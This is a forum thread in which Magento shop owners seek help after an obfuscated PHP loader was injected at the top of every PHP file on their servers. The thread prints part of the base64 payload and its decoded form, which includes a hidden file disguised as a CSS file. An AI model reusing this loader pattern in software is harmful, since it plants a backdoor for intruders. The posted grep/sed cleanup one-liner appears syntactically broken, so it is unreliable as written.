Magento Forum

   
Got hacked - they added a script on top of EVERY single PHP file on my server - please help! 
 
sportgirl
Jr. Member
 
Total Posts:  3
Joined:  2008-12-26
 

My site got hacked .. please helppppp!!!

They added a script on top of all of my php files with the following:
<?php /**/eval(base64_decode(’aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydt ... (it goes on ...)

which says:
if(function_exists(’ob_start’)&&!isset($GLOBALS[’mfsn’])){$GLOBALS[’mfsn’]=’/shop/media/catalog/product/cache/8/thumbnail/120x/5e06319eda06f020e43594a9c230972d/images/catalog/product/placeholder/style.css.php’;if(file_exists($GLOBALS[’mfsn’])){include_once($GLOBALS[’mfsn’]);if(function_exists(’gml’)&&function;_exists(’dgobh’)){ob_start(’dgobh’);}}}

Luckily it’s the same code / string, so I should be able to run a search and replace for this string.

Do you know a UNIX command to replace this piece of code in multiple files?
How do I clean this piece of code?

I need help!

 
Magento Community Magento Community
Magento Community
Magento Community
 
Adam Moss
Sr. Member
 
Avatar
Total Posts:  248
Joined:  2009-02-11
Birmingham, UK
 

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

 
Magento Community Magento Community
Magento Community
Magento Community
 
sportgirl
Jr. Member
 
Total Posts:  3
Joined:  2008-12-26
 
Highwayman - 22 April 2010 10:38 PM

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

Thank you. It’s going to take a long time to do this since I have thousands of files.
How do I prevent this from happening again?

 
Magento Community Magento Community
Magento Community
Magento Community
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

How do I prevent this from happening again?

Change your FTP login credentials immediately.  Don’t use an FTP program that stores your password for you (or, more to the point, don’t ever let a login application to your server store the login info...you should enter it manually every time).  Make sure your PC is clean of anything malicious.  I haven’t yet seen a case where Magento itself was “hacked” but rather it seems to always be the case where the ftp login credentials got comprimised.

 
Magento Community Magento Community
Magento Community
Magento Community
 
wmike
Jr. Member
 
Total Posts:  29
Joined:  2008-06-03
 

Same happened to my website yesterday. I’m on Bluehost and they tech support sucks. Before I find out what’s going on, the tech support guys (3 of them) were blaiming my Internet Explorer and advising to change to a different browser!!!
My attention caught the freshly modified index.php and when I opened it, right on the top was this additional code. Same as yours! Then I randomly checke few other .php files and looks like most of .php is infected.
My permissions are 755 and 644. Was that a reason that it was so easy to breach the security?
It is hard to believe that attack came from my ftp stored login. Last time I use it was about 5-6 month ago and my home PC is protected and scanned daily and on access.
Have you find an easy solution to fix it? I can’t imagine looking for each infection and editing it manually?

 
Magento Community Magento Community
Magento Community
Magento Community
 
yaozer
Jr. Member
 
Avatar
Total Posts:  27
Joined:  2009-10-12
Shanghai
 

web hosting tech is often not good.

need a script to mass delete them.

comfort.

wmike - 07 May 2010 11:36 AM

Same happened to my website yesterday. I’m on Bluehost and they tech support sucks. Before I find out what’s going on, the tech support guys (3 of them) were blaiming my Internet Explorer and advising to change to a different browser!!!
My attention caught the freshly modified index.php and when I opened it, right on the top was this additional code. Same as yours! Then I randomly checke few other .php files and looks like most of .php is infected.
My permissions are 755 and 644. Was that a reason that it was so easy to breach the security?
It is hard to believe that attack came from my ftp stored login. Last time I use it was about 5-6 month ago and my home PC is protected and scanned daily and on access.
Have you find an easy solution to fix it? I can’t imagine looking for each infection and editing it manually?

 
Magento Community Magento Community
Magento Community
Magento Community
 
SimpleHelixcom
Enthusiast
 
Avatar
Total Posts:  906
Joined:  2007-08-31
Huntsville, AL
 

I know this is old, but here’s how to wipe out all instances of that script if they exist on one line:

IFS=$'\n';for i in ` grep <PART_OF_BAD_SCRIPT> * -lsr `; do sed -'/<PART_OF_BAD_SCRIPT>/ d' "$i"done

for example:

IFS=$'\n';for i in ` grep aWYoZnVuY3Rpb25f * -lsr `; do sed -'/aWYoZnVuY3Rpb25f/ d' "$i"done

 
Magento Community Magento Community
Magento Community
Magento Community
 
louise100
Sr. Member
 
Avatar
Total Posts:  165
Joined:  2009-01-26
UK
 

hi,

Just out of interest, what version of magento got hacked? Has anyone shed any light on how this happened?
Is this a magento specific problem or a server security problem?

Louise

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
    Back to top